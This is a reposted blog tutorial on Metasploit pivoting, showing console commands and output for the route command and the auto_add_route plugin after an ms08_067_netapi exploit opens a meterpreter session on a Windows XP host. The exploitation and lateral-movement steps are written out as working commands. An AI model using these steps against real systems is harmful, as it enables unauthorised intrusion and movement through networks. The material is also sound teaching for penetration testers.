Automatic Routing Through New Subnets

Among the coolest features in metasploit is the ability to tunnel through a meterpreter session to the network on the other side. The route command in msfconsole sets this up but requires a bit of experience to get right.


[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1238)

meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1

msf exploit(ms08_067_netapi) >

After running the above commands any traffic sent to the 10.1.1.0 network will be tunnelled through the session. There also is a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:


msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.1.1.52:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.52:4444 -> 10.1.1.118:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1

msf exploit(ms08_067_netapi) >

The auto_add_route plugin is now available in the metasploit trunk; ‘svn up’ to get it.

Source: Metasploit Blog

Leave a Reply

 

 

 

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*